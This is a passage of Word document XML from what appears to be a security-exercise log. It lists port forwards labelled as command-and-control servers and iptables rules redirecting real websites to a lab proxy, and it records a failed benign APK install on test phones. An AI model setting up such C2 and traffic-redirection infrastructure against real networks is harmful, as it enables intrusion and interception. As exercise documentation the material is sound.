              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="254C09AE"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15:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="711C2995"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TA1 ClearScope 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60741D02"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Appstarter APK Micro APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ADED6CF" w14:textId="06E174D1" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_9hyhkxbikvta" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="126" w:name="_Toc12600068"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="51E3BF81"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00] 77.138.117.150:80 -&gt; 128.55.12.167:8100</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs2: micro c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29369EE4"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06] 153.4.41.7:80 -&gt; 128.55.12.167:8106</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>theia1: www.nhra.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A614D"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07] 189.141.204.211:80 -&gt; 128.55.12.167:8107</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>theia1: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F3A3F6"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08] 208.203.20.42:80 -&gt; 128.55.12.167:8108</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>theia1: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5D7CE"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10] 170.32.78.39:80 -&gt; 128.55.12.167:8110</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: bits oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994BF98"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11] 215.237.119.171:80 -&gt; 128.55.12.167:8111</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: serve (bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87082E"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12] 68.149.51.179:80 -&gt; 128.55.12.167:8112</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: thttpd (bits micro)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49519E02"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 xml:space="preserve">[eth0:1113] 113.165.213.253:80 -&gt; 128.55.12.167:8113  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5d: micro c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B278FA3"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14] 49.8.46.240:80 -&gt; 128.55.12.167:8114</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE430C"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15] 42.183.7.162:80 -&gt; 128.55.12.167:8115</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791EED3C"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16] 133.39.25.45:80 -&gt; 128.55.12.167:8116</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cs: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32801ABF"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17] 98.23.182.25:80 -&gt; 128.55.12.167:8117</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: sc serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EE647"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18] 4.21.51.250:80 -&gt; 128.55.12.167:8118</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>cadets: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40252A47" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD3C2A0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>vyatta@internet:~$ ping www.nintendo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE765A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>PING www.nintendo.com (192.195.204.26) 56(84) bytes of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F28D8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727ED19D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>vbash-4.1# iptables --table nat --list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C6AA7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Chain PREROUTING (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D42A76" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">target     prot opt source               destination         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DC7A3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             www.nintendo.com     multiport dports www,http-alt to:128.55.12.1:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229078BB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             www.nhra.com         multiport dports www,http-alt to:128.55.12.1:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B746079" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             www.yale.edu         multiport dports www,http-alt to:128.55.12.1:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5C0D2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             192.196.28.222       multiport dports www,http-alt to:128.55.12.1:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E32157" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             www.usdoj.gov        multiport dports www,http-alt to:128.55.12.1:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82D368" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>DNAT       tcp  --  anywhere             64.236.91.22         multiport dports www,http-alt to:128.55.12.1:3128.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F51D97" w14:textId="1F898D46" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_e3r1iv551x5y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="128" w:name="_Toc12600069"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10:22 -- TA1 ClearScope 1 -- Benign Activity (Screencap APK, Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="0A7CF769" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tried to install the benign Screencap APK to verify that the phones were working after we reached out to BBN.  Found that they were still in an unusable state.  BBN checked on the phones later in the day.  They found that ch04 was stuck in landscape mode and completely unresponsive to touch and had been since before our failed test on the previous day as the time on the phone was frozen at 3:55PM.  It did not respond to the power or volume keys.  They reached out to ClearScope to fix the phone, but we were unable to run the test at this time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C2A8B" w14:textId="439479CD" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_cquci684ccsq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="130" w:name="_Toc12600070"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="7469078F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-translate</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.54</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Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53FCE5" w14:textId="32239FC9" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_nl6ka8ck0j4v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="132" w:name="_Toc12600071"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="3D19D873"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Screencap APK (Benign, Failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239185FA" w14:textId="201D49F4" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_pq9g25ppwkme" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="134" w:name="_Toc12600072"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="20CD8544"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10:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E3316"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admin@ta51-bg-gen:~/apk$ scp screencap-instr.apk user@128.55.12.54:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A7B02"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The authenticity of host '128.55.12.54 (128.55.12.54)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDAF0D"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ECDSA key fingerprint is SHA256:IW9lmb1xHtgkZoFS2Al47jLKiVuXu9qnY37PzM6CO40.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C16FD2"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Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBACEB"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Warning: Permanently added '128.55.12.54' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455A735"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user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC956A"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screencap-instr.apk                                                                                                                                                                                                 100%   35KB  35.4KB/s   00:00   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FCD256" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061DE405"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10:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C13ED3"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admin@ta51-bg-gen:~/apk$ ssh user@128.55.12.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67940888"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user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518281E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC7D126"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10:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF9F3B"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admin@ta51-bg-gen:~/apk$ scp screencap-instr.apk user@128.55.12.114:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C812A"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The authenticity of host '128.55.12.114 (128.55.12.114)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D73DCDB"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ECDSA key fingerprint is SHA256:IW9lmb1xHtgkZoFS2Al47jLKiVuXu9qnY37PzM6CO40.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECAB07"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Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A13D8"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Warning: Permanently added '128.55.12.114' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A88194F"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user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FF5B7"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screencap-instr.apk                                                                                                                                                                                                 100%   35KB  35.4KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC25DCB"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admin@ta51-bg-gen:~/apk$ ssh user@128.55.12.114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D953FAB"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user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B82D9B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA6CC7" w14:textId="7F05F2F2" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
